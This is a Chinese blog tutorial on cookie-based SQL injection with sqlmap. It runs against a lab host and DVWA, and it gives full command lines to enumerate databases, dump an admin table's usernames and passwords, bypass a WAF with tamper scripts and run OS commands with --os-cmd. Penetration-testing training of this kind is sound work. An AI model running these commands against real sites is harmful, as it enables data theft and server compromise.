sqlmap之(五)----Cookie注入实战

本文详细介绍如何使用SQLMap工具进行SQL注入攻击,包括注入点探测、表名猜解、字段名猜解以及敏感数据导出等步骤。通过实例操作,帮助读者理解SQL注入的工作原理及防范措施。
部署运行你感兴趣的模型镜像

(1) cookie注入,猜解表


sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "id=27" --table --level 2




do you want to URL encode cookie values (implementation specific)? [Y/n]

你想要对URL值进行URL编码(具体实现)吗?   输入"Y"




Cookie parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]

cookie参数“id”是脆弱的。你想继续测试其他(如果有的话)吗?  输入"Y"




do you want to use common table existence check? [Y/n/q]

你是否要使用存在的公共表去检查? [Y/n/q]  输入"Y" 并输入线程数。




等待一下就出结果了。




(2) 猜解字段,(通过1的表猜解字段,假如表为admin)


sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "id=27" --columns -T admin --level 2





(3) 猜解内容


sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "id=27" --dump -T admin -C "user,password" --level 2



猜出的内容为



您可能感兴趣的与本文相关的镜像

Wan2.2-T2V-A5B

Wan2.2-T2V-A5B

文生视频
Wan2.2

Wan2.2是由通义万相开源高效文本到视频生成模型,是有​50亿参数的轻量级视频生成模型,专为快速内容创作优化。支持480P视频生成,具备优秀的时序连贯性和运动推理能力

在进行SQL注入实战操作时,`sqlmap` 是一个功能强大的自动化工具,能够帮助测试人员发现并利用 SQL 注入漏洞。以下是以 DVWA(Damn Vulnerable Web Application)为例的实战操作指南。 ### 1. 环境准备 在开始之前,确保以下环境配置完成: - 安装好 DVWA 并部署在本地或远程服务器上。 - 确保 `sqlmap` 已安装,它是一个基于 Python 的工具,可以通过命令行运行。 - 确保浏览器可以访问 DVWA 的 SQL 注入页面,通常为 `http://localhost/dvwa/vulnerabilities/sqli/`。 DVWA 的 SQL 注入漏洞存在于其用户输入处理逻辑中,例如用户输入未经过滤或转义,直接拼接到 SQL 查询中,从而允许攻击者注入恶意 SQL 语句。 ### 2. 登录 DVWA 并获取 Cookie DVWA 需要登录后才能访问某些页面,因此需要先获取登录后的 Cookie。可以使用浏览器的开发者工具(如 Chrome 的 DevTools)查看登录请求的 Cookie 信息。 假设登录后的 Cookie 为 `PHPSESSID=abc123; security=low`,该 Cookie 用于维持会话并指定安全级别为 `low`。 ### 3. 使用 sqlmap 探测注入点 使用 `sqlmap` 探测目标 URL 是否存在 SQL 注入漏洞。命令如下: ```bash sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=abc123; security=low" --dbs ``` 此命令将探测目标 URL 并列出数据库名称。`--cookie` 参数用于提供登录后的 Cookie 信息,以维持会话状态。 ### 4. 获取数据库信息 如果探测成功,可以进一步获取数据库信息,例如当前数据库名称、用户等。命令如下: ```bash sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=abc123; security=low" --current-db ``` ```bash sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=abc123; security=low" --current-user ``` ### 5. 获取表和列信息 获取指定数据库中的表信息: ```bash sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=abc123; security=low" -D <database_name> --tables ``` 获取指定表的列信息: ```bash sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=abc123; security=low" -D <database_name> -T <table_name> --columns ``` ### 6. 提取数据 提取指定表中的数据: ```bash sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=abc123; security=low" -D <database_name> -T <table_name> -C <column_name> --dump ``` ### 7. 高级操作 - **绕过 WAF**:可以使用 `--tamper` 参数加载篡改脚本,修改注入 payload 以绕过 Web 应用防火墙(WAF)。 - **系统命令执行**:如果数据库支持,可以尝试执行系统命令: ```bash sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=abc123; security=low" --os-cmd=whoami ``` ###
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值